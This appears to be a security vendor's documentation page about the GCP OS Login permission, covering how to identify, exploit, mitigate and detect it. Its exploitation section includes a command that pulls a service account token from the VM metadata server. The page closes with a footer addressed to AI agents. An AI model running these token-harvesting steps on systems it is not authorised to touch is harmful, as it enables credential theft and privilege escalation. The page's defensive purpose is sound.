> For the complete documentation index, see [llms.txt](https://docs.forestall.io/fsprotect/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://docs.forestall.io/fsprotect/edges/gcp/gcp_can_ssh_vm.md). # GCP\_CAN\_SSH\_VM ## Summary | | | | -------------------------- | ----------------------------------------------------- | | **FSProtect ACL Alias** | GCP\_CAN\_SSH\_VM | | **GCP Alias** | Compute Execution & Pipeline Pivots | | **Affected Object Types** | Projects | | **Exploitation Certainty** | Likely | | **Granting Roles** | `roles/compute.osLogin`, `roles/compute.osAdminLogin` | ## Description `GCP_CAN_SSH_VM` indicates that an identity holds OS Login permissions (`roles/compute.osLogin` or `roles/compute.osAdminLogin`) which allow logging into existing GCE VMs via **OS Login**. OS Login ties SSH access to IAM identity, replacing traditional SSH key management. An attacker with this permission can log into any VM in the project (or org, if the role is scoped at that level) and interact with the OS. ## Identification ### gcloud CLI ```bash PROJECT_ID="my-project" # List VMs and their SA attachments gcloud compute instances list --project=$PROJECT_ID \ --format="table(name, zone, status, serviceAccounts[0].email, metadata.items[enable-oslogin])" # Find who has OS Login permissions gcloud projects get-iam-policy $PROJECT_ID --format=json | \ jq '.bindings[] | select(.role | test("compute.osLogin|compute.osAdminLogin")) | {role: .role, members: .members}' # Check if OS Login is enabled on the project gcloud compute project-info describe --project=$PROJECT_ID \ --format="value(commonInstanceMetadata.items)" | grep enable-oslogin # Check instance-level OS Login setting (can override project default) gcloud compute instances describe VM_NAME --zone=ZONE --project=$PROJECT_ID \ --format="value(metadata.items)" ``` ### GCP Console 1. Open **GCP Console** → **Compute Engine** → **VM Instances**. 2. Click on a VM → **SSH** button — if enabled, IAM principals with OS Login roles can access it. 3. Check **IAM & Admin** → **IAM** for `Compute OS Login` or `Compute OS Admin Login` roles. ## Exploitation ### gcloud CLI ```bash # Identify VMs running high-privilege service accounts gcloud compute instances list --project=$PROJECT_ID \ --format="table(name, zone, status, serviceAccounts[0].email)" # Confirm OS Login is enabled gcloud compute project-info describe --project=$PROJECT_ID \ --format="value(commonInstanceMetadata.items)" | grep enable-oslogin # Check for OS Login roles in project gcloud projects get-iam-policy $PROJECT_ID --format=json | \ jq '.bindings[] | select(.role | test("compute.osLogin|compute.osAdminLogin")) | {role: .role, members: .members}' # SSH into the target VM gcloud compute ssh VM_NAME --zone=us-central1-a --project=$PROJECT_ID # Query the metadata server for the SA token from inside the VM curl -s -H "Metadata-Flavor: Google" \ "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" ``` ## Mitigation 1. **Scope OS Login roles narrowly** — assign at specific VM resource level rather than project-wide where possible. 2. **Use `roles/compute.osLogin`** (non-sudo) instead of `roles/compute.osAdminLogin` unless root access is needed. 3. **Attach minimal-privilege SAs to VMs** — VMs that don't need elevated GCP API access should use a dedicated low-privilege SA. 4. **Block metadata server access from VMs** that don't need it using custom metadata or network controls. ## Detection | Log Type | Method | Key Fields | | ------------ | ------------------------------------ | ---------------------------- | | Data Access | `compute.instances.get` via OS Login | SSH connection attempts | | System Event | OS Login SSH auth | `resource.type=gce_instance` | ```bash # Monitor OS Login authentication events gcloud logging read \ 'resource.type="gce_instance" AND protoPayload.methodName=~"oslogin"' \ --project=$PROJECT_ID \ --format="table(timestamp, protoPayload.authenticationInfo.principalEmail, resource.labels.instance_id)" ``` Alert on: * OS Login SSH connections to VMs running high-privilege SAs. * SSH connections from unexpected geographic locations or IP ranges. * Metadata server token requests shortly after an OS Login session begins. ## References * * --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://docs.forestall.io/fsprotect/edges/gcp/gcp_can_ssh_vm.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.